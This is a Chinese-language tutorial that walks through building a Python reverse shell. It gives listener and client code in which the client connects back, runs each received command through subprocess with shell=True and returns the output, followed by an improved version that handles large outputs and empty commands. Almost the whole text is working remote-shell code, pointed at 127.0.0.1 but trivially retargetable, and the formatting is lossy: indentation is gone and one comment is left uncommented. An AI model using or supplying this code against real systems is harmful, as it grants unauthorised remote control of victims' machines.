反向Shell的实现也是可以通过python来实现,接下来会用到socket, subprocess来写。
服务端
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)#设置端口重用
s.bind(('127.0.0.1', 5000))
s.listen(5)
while True:
conn, addr = s.accept()#等待连接请求
while True:
cmd = input('Shell>').strip()
conn.sendall(cmd.encode('gbk'))#发送命令
print(conn.recv(1024).decode('gbk'))#接受命令回显
客户端
import socket
import subprocess
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(('127.0.0.1', 5000))#连接机器
while True:
cmd = c.recv(1024).decode('gbk')接受命令
obj = subprocess.Popen(cmd, #执行命令并将命令回显放入管道PIPE
shell = True,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
data = obj.stdout.read() + obj.stderr.read()#将管道中的命令回显赋值给data
c.sendall(data)#发送命令回显
以上就是一个简单的python反向shell案例,但是会在命令回显大量数据的时候出现报错,是因为出现了tcp粘包问题,所以我们需要将命令确定长度后单独接收,也会出现如果你直接按下回车会发送空,但是空代表没有数据那么就不会被发送接收导致客户端收不到任何消息于是就没有任何命令回显,所以会在发送空后阻塞在recv的地方。
以下为改进代码:
服务端
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1', 5000))
s.listen(5)
while True:
conn, addr = s.accept()
while True:
cmd = input('Shell>').strip()
if not cmd:#如果命令为空就重新输入
continue
conn.sendall(cmd.encode('gbk'))
cmd_size = int(conn.recv(8).decode('gbk'))#接受命令回显长度
add_size = 0
while add_size < cmd_size:#当回显长度达到就跳出循环
swap = conn.recv(1024)
add_size += len(swap)
print(swap.decode('gbk'), end = '')#依次打印每次回显的内容
客户端
import socket
import subprocess
c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
c.connect(('127.0.0.1', 5000))
while True:
cmd = c.recv(1024).decode('gbk')
obj = subprocess.Popen(cmd,
shell = True,
stdout = subprocess.PIPE,
stderr = subprocess.PIPE)
data = obj.stdout.read() + obj.stderr.read()
c.sendall(bytes(str(len(data)), 'gbk').zfill(8))#发送命令长度
c.sendall(data)#再发送数据